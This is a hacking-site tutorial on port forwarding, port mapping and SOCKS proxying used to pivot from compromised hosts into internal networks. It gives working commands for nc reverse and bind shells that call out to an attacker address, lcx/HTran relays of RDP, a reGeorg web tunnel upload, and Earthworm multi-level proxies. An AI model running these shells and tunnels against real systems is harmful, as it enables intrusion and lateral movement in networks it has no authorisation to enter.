Hacking Book | Free Online Hacking Learning


Port forwarding, port mapping and proxies for intranet penetration

Posted by agaran at 2020-02-27

0x01 What is port forwarding

Port forwarding, sometimes called tunneling, is the technique SSH uses for secure network communication. It is the act of forwarding a network port from one network node to another, so that an external user can reach a port on a private internal IP address (inside the LAN) through a NAT router that has been configured for it.

In plain terms: port forwarding means taking a port, either on the local machine or on any host the local machine can reach, and forwarding it to any IP that can be reached; usually that IP is a public one.

0x02 What is port mapping

Port mapping is a form of NAT. Its job is to translate an address on the public network into a private address. An ADSL broadband router in routing mode has a dynamic or fixed public IP; the ADSL line connects directly to a hub or switch, and all computers behind it share the Internet connection.

In plain terms: port mapping means mapping an intranet port onto a port on the public network. Suppose my own computer sits in an intranet with no public IP address, but I want to expose a port for others to use. That is port mapping.

0x03 Port mapping versus port forwarding

Port mapping scenario:

External host A wants to access a service on internal host B.

Port forwarding scenario:

External host A can reach any port on internal host B, but cannot reach a port on internal host C.

In this case you can connect the port on host C to a port on host B. Then, when external host A accesses that port on host B, it is effectively accessing the port on host C.

Conclusion:

The principle behind port forwarding and port mapping is the same; only the application scenarios differ. If we forward a local port to a port on a remote host, we can call it either port mapping or port forwarding. See the figure below [note the text on the figure].

If we forward a port of any IP reachable from this machine to a port on another server, we call it port forwarding. See the figure below [note the text on the figure].

0x04 Forward connection versus reverse connection

0x05 Port forwarding and proxy tools

0x06 Environment topology

Host A: Win7

Host B: Win7

Host C: XP

0x07 nc

nc usage

2. Network environment assumed for an nc reverse connection:

A: external network, cannot reach intranet host B [A is the attacker on the external network]

B: intranet, can reach external host A

A:192.168.0.226

B:192.168.32.130

This suits an nc reverse connection: bounce the shell of intranet host B out to external host A.

Execute on external host A: nc -nvlp 7777

Execute on intranet host B: nc -e cmd 192.168.0.226 7777

Assume here that I already have a shell on B and have uploaded nc.

Output on host A:

3. Network environment assumed for an nc forward connection:

A: intranet, can reach external host B [A is the attacker on the intranet]

B: external network, cannot reach intranet host A

This suits an nc forward connection: it likewise bounces the shell of intranet host A out to Internet host B.

Execute on intranet host A: nc -l -p 5555 -e cmd.exe

Execute on external host B: nc -nvv 192.168.0.226 5555

4. Note:

If the client [the intranet side] connects to the server [the external side] and wants to obtain the server's shell, that is a forward shell. If the client connects to the server and the server wants to obtain the client's shell, that is a reverse shell.

nc is known as the security Swiss Army knife. It is famous because it can not only spawn reverse shells but also forward ports, chat, and more.

0x08 lcx

lcx usage:

Environment assumed for lcx port mapping:

A: external network, cannot reach intranet host B [A is the attacker on the external network]

B: intranet, can reach external host A

Execute on intranet host B: lcx.exe -slave 192.168.0.226 7777 192.168.32.132 3389

This forwards port 3389 of the intranet host (192.168.32.132) to port 7777 of the public host (192.168.0.226).

Execute on external host A: lcx.exe -listen 7777 5555

This listens on port 7777 of the local host and relays it to port 5555.

Now opening a remote desktop connection to 127.0.0.1:5555 on host A is equivalent to accessing port 3389 on B.

Environment assumed for lcx port forwarding:

A: Internet, can reach B

B: intranet, can reach C

A cannot reach C

Host A IP: 192.168.0.226

Host B IP: 192.168.32.130

Host C IP: 192.168.32.135

Execute on intranet host B: lcx.exe -tran 7777 192.168.32.135 3389

This means: relay port 3389 of host C to port 7777 of host B.

Now accessing port 7777 on host B is equivalent to accessing port 3389 on host C.

Running mstsc against 192.168.32.130:7777 on host A, or against 127.0.0.1:7777 on host B, reaches port 3389 of C.

Explanation

lcx is mostly used on compromised hosts ("broilers") inside an intranet. When the attacker wants to manage the host through a remote terminal, they generally enable 3389 on the compromised host and then forward it out with lcx.
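The -tran mode above is nothing more than a two-socket pipe: accept on one port, dial the target, and copy bytes in both directions until one side closes. The following is an added illustration written for this page, not code from lcx or from the original post; it runs the pipe against a constructed local echo service standing in for the 3389 service on host C, which is also why a new listener on an unexpected port of an internal host is worth investigating.

```python
import socket
import threading

def _pump(src, dst):
    """Copy bytes one way until src hits EOF, then half-close dst so the EOF propagates."""
    try:
        while data := src.recv(4096):
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass

def _listener(port=0):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(5)
    return srv

def start_relay(target_host, target_port, listen_port=0):
    """The lcx -tran idea: accept on listen_port, dial the target, pipe both ways.
    Returns the port actually bound (0 asks the OS for a free one)."""
    srv = _listener(listen_port)
    def accept_loop():
        while True:
            client, _ = srv.accept()
            upstream = socket.create_connection((target_host, target_port))
            # two pumps make the pipe bidirectional
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()
    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]

def start_echo_server():
    """Constructed stand-in for the service on host C (the 3389 service in the text)."""
    srv = _listener()
    def serve():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=_pump, args=(conn, conn), daemon=True).start()
    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

def relay_roundtrip(payload: bytes) -> bytes:
    """Client (host A) talks only to the relay port (host B) yet reaches the service (host C)."""
    relay_port = start_relay("127.0.0.1", start_echo_server())
    with socket.create_connection(("127.0.0.1", relay_port)) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)  # tell the pipe we are done sending
        chunks = []
        while data := c.recv(4096):
            chunks.append(data)
    return b"".join(chunks)

if __name__ == "__main__":
    print(relay_roundtrip(b"hello via relay"))
```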

0x09 HTran

HTran usage

HTran usage: environment scenario I

B is on the public network

A can reach B directly [B has 3389 enabled, but B's firewall blocks connections to 3389]

B can also reach A

Host A IP: 192.168.0.226

Host B IP: 192.168.32.130

Host C IP: 192.168.32.135

Method 1:

Execute on host B: htran2.4.exe -p -tran 7777 127.0.0.1 3389

This means: relay port 3389 of B to port 7777 on the same machine.

Now host A opens a remote desktop connection to 192.168.32.130:7777.

Method 2:

Listen on host A: htran2.4.exe -p -listen 8888 9999

This listens on port 8888 of the local machine and turns the traffic on port 8888 over to port 9999.

Execute on host B: htran2.4.exe -p -slave 192.168.0.226 8888 127.0.0.1 3389

This forwards port 3389 of the local machine to port 8888 of A.

Next, on host A, connect remote desktop to local port 9999 to reach port 3389 of B.

HTran usage: environment scenario II

Host B is on the public network

C is on the intranet behind B

A can reach B, but not C

Host A IP: 192.168.0.226

Host B IP: 192.168.32.130

Host C IP: 192.168.32.135

Method 1:

Execute on host B: htran2.4.exe -p -tran 8888 192.168.32.135 3389

This forwards port 3389 of host C to port 8888 of host B.

Now A connecting to port 8888 of B is equivalent to reaching port 3389 of C.

Method 2:

Listen on host B: htran2.4.exe -p -listen 7777 9999

This listens on port 7777 of host B and forwards the traffic to port 9999.

Execute on host C: htran2.4.exe -p -slave 192.168.32.130 7777 127.0.0.1 3389

This means: relay port 3389 of C to port 7777 of B.

0x01 What is a proxy

A proxy, also called a network proxy, is a special network service that lets one network endpoint (generally the client) connect indirectly to another endpoint (generally the server) through the service. Some network devices, such as gateways and routers, have a proxy function. Proxy services are generally held to protect the privacy and security of endpoints and to prevent attacks.

0x02 Proxy categories

HTTP proxy

SOCKS proxy

FTP proxy

Telnet proxy

SSL proxy

0x03 Forward proxy versus reverse proxy

With a forward proxy, the proxy and the client sit in the same LAN and the proxy is transparent to the server; with a reverse proxy, the proxy and the server sit in the same LAN and the proxy is transparent to the client. One proxies for the client, the other proxies for the server.

Note: diagram drawn by me, go easy on it.

0x04 reGeorg + proxychains proxy

reGeorg is the successor to reDuh. It mainly forwards ports of the intranet server to the local machine through an HTTP/HTTPS tunnel.

Select the server script for the target's platform and upload it to host B's server; here it is PHP.

Requesting the uploaded file shows "Georg says, 'All seems fine'", which means the proxy endpoint is working.

Then run the reGeorgSocksProxy.py script [the urllib3 module is required]: python2 reGeorgSocksProxy.py -u "http://192.168.32.130/tunnel.php" -p 8888

The command line also prints "All seems fine".

Next, use the tool Proxifier:

Add a proxy server first.

Configure the proxy rules.

Select the remote desktop program mstsc here.

Connect to the remote desktop.

You can see the traffic passing through the proxy.

0x05 Socks4/5 proxy based on PowerShell

Using Invoke-SocksProxy: https://github.com/p3nt4/Invoke-SocksProxy

Invoke-SocksProxy usage

Invoke-SocksProxy usage method 1

Win10 host IP: 192.168.192.130

Win7 host IP: 192.168.192.129

Setting up a Socks4/5 proxy

First run PowerShell with administrator privileges on the Win10 host. If you are told that script execution is disabled, enter "Set-ExecutionPolicy RemoteSigned".

Enter Import-Module .\Invoke-SocksProxy.psm1 to import the module.

Enter Invoke-SocksProxy -bindPort 1234 to create a socks proxy on port 1234.

Next, use socks proxy software on the Win7 host to reach the Internet through port 1234 of the Win10 host.

This time I use SocksCap; proxychains would of course work too.

Click File, select Settings to set the SOCKS server IP and port, then click Apply to confirm.

Click New to select the program that should go through the proxy; I choose Firefox here.

Click Run and browse to Baidu.

In the window on the Win10 host you can see that the connection succeeded.

Invoke-SocksProxy usage method 2

Threaded mode: enter Invoke-SocksProxy -bindPort 1234 -threads 400

If -bindPort is omitted, the default port is 1080.

0x06 Earthworm

EW (Earthworm) is a set of portable network penetration tools with two core functions, Socks5 service setup and port forwarding, which can carry out network penetration in complex network environments.

Note: this tool is no longer updated or available for download.

Earthworm usage

The following is a schematic diagram:

The tool can open a tunnel into the depths of a network in "forward", "reverse" or "multi-level cascade" fashion, breaking through network restrictions with the earthworm's own means and loosening the soil under the firewall.

The toolkit provides executables for several operating systems: Linux, Windows, MacOS and ARM Linux are all included, and support for more platforms is still being worked on. Please wait.

Usage:

In all of the following examples, unless stated otherwise, the proxy port is 1080 and the service is a Socks5 proxy.

The tool has six command modes (ssocksd, rcsocks, rssocks, lcx_slave, lcx_listen, lcx_tran).

$ ./ew -s ssocksd -l 1080

The reverse setup is done in two steps:

a) First, run the following on host A, which has a public IP:

$ ./ew -s rcsocks -l 1080 -e 8888

b) Start the Socks5 service on target host B and bounce it back to port 8888 of the public host:

$ ./ew -s rssocks -d 1.1.1.1 -e 8888

Success.

The tool has three port forwarding modes. Their parameter formats are as follows:

$ ./ew -s lcx_listen -l 1080 -e 8888

$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999

$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999

With these port forwarding modes, TCP based services deep inside the network, such as Socks5, can be forwarded out to the entry point.

First, two local socks test samples of a "two-level cascade":

a) Usage of lcx_tran

$ ./ew -s ssocksd -l 9999

$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999

b) Usage of lcx_listen and lcx_slave

$ ./ew -s lcx_listen -l 1080 -e 8888

$ ./ew -s ssocksd -l 9999

$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999

Another local socks test case, a "three-level cascade", is provided for reference:

$ ./ew -s rcsocks -l 1080 -e 8888

$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999

$ ./ew -s lcx_listen -l 9999 -e 7777

$ ./ew -s rssocks -d 127.0.0.1 -e 7777

Data flow: Socks5 -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks

Note: the content above is from the README on the official site or bundled with the tool.

Earthworm usage method 1 [forward proxy]

Win7 host IP: 192.168.192.1

Win7 host IP: 192.168.192.9

The target network boundary has a public IP and can open any listening port:

+---------+      +----------------------+
|HackTools| ->>  | 7777 -> 192.168.192.9 |
+---------+      +----------------------+

Execute: ew_for_win_32.exe -s ssocksd -l 7777

On the Win7 host 192.168.192.9, this command opens a socks proxy on port 7777.

Next you can use tools such as SocksCap or proxychains to reach the proxy port. Since I covered those earlier I will not repeat it and will just show the screenshot of the demonstration.

Note: this is a forward proxy. The hacker's client is the proxy user, and the compromised host it connects to plays the server.

Earthworm usage method 2 [reverse proxy]

Win7 X32 host IP: 192.168.0.75 [hack machine]

Win7 host IP: 192.168.0.226 [public network machine]

Win7 host IP: 192.168.192.9 [intranet]

The target network boundary has no public IP address, so you need to create the socks proxy by bouncing out:

192.168.192.9    controllable public IP host          controllable internal host
+---------+      +--------------------------+    |    +---------------+
|HackTools| ->>  | 1089 -> 192.168.0.226 -> 9999 | firewall <<- | 192.168.0.75  |
+---------+      +--------------------------+    |    +---------------+

On the public host [VPS], execute: ew_for_win_32.exe -s rcsocks -l 1089 -e 9999

This adds a relay tunnel on the public host 192.168.0.226 and hands the proxy requests received on 1089 back to whichever host connects in on port 9999.

Execute on the intranet host [the controllable compromised host]: ew_for_win_32.exe -s rssocks -d 192.168.0.226 -e 9999

This connects the controllable intranet host of the target network back out to the public host.

Next, point SocksCap or proxychains at 192.168.0.226:1089 to use the Socks5 proxy service provided by the rssocks host.

Earthworm usage method 3

Win7 host IP: 192.168.192.1 [hack machine]

Win7 host IP: 192.168.192.9 [a]

Win7 host IP: 192.168.192.11 [b]

Suppose you have obtained control of two hosts, A and B, in the target network, as follows:

Host A: has a public IP address and can listen on any port freely, but cannot reach the specific resource.

Host B: internal host of the target network; can reach the specific resource but cannot reach the public network.

Host A can connect directly to host B.

Controllable boundary host A can reach host B, which has access to the specified resource:

+---------+      +-----------------------+       +-----------------------+
|HackTools| ->>  | 1099 -> 192.168.192.9 | ->>   | 7777 -> 192.168.192.11 |
+---------+      +-----------------------+       +-----------------------+

Execute on host B: ew_for_win_32.exe -s ssocksd -l 7777

On host B, this starts a socks proxy on port 7777 in ssocksd mode.

Execute on host A: ew_for_win_32.exe -s lcx_tran -l 1099 -f 192.168.192.11 -g 7777

This means the socks proxy requests received on port 1080 are relayed to port 7777 of host B.

Next, point SocksCap or proxychains at 192.168.192.9:1099 to use the Socks5 proxy service provided by the rssocks host.

Screenshot of the proxy working:

Earthworm usage method 4

Win7 host IP: 192.168.192.1 [hack machine]

Win7 host IP: 192.168.192.9 [a]

Win7 host IP: 192.168.192.10 [public network machine]

Win7 host IP: 192.168.192.13 [b]

Suppose you have obtained control of two hosts, A and B, in the target network, as follows:

Host A: the boundary host of the target network. It has no public IP address and cannot reach the specific resource.

Host B: the internal host of the target network; it can reach the specific resource but cannot connect back to the public network.

Host A can connect directly to host B.

Add a relay tunnel on the public host 192.168.192.10 and hand the proxy requests received on 1080 back to whichever host connects in on port 8888.

On host 192.168.192.13 [B], start a socks proxy on port 9999 in ssocksd mode.

This means: on 192.168.192.9, use the tool's lcx_slave mode to open the communication tunnel between 192.168.192.10:8888 and 192.168.192.13:9999.

Screenshot of success:

[Screenshot labels: B, public network, A, hack machine]

Note: the part marked in red is expected; my proxy host B cannot reach the Internet.

Earthworm summary

At present the tool offers six link modes, selected with the -s parameter:

ssocksd rcsocks rssocks

lcx_slave lcx_tran lcx_listen

The core Socks5 service logic is provided by ssocksd and rssocks, corresponding to the forward and reverse socks proxies respectively.

The remaining lcx link modes are used to open a path between the test host and the SOCKS server.

lcx-type pipes:

lcx_slave: one end of the pipe connects to the proxy requester by bouncing out, and the other end connects to the host providing the proxy.

lcx_tran: the pipe receives proxy requests by listening on a local port and relays them to the host providing the proxy.

lcx_listen: the pipe receives data by listening on a local port and relays it to the proxy-providing host that has connected back out of the target network.

By combining the characteristics of the lcx-type pipes, penetration testing in multi-layer intranet environments can be achieved.

Note: this is a summary I wrote earlier; I have revised the content and shared the pictures. Many tools such as FRP and ngrok are not covered. If there is any problem, please don't flame me.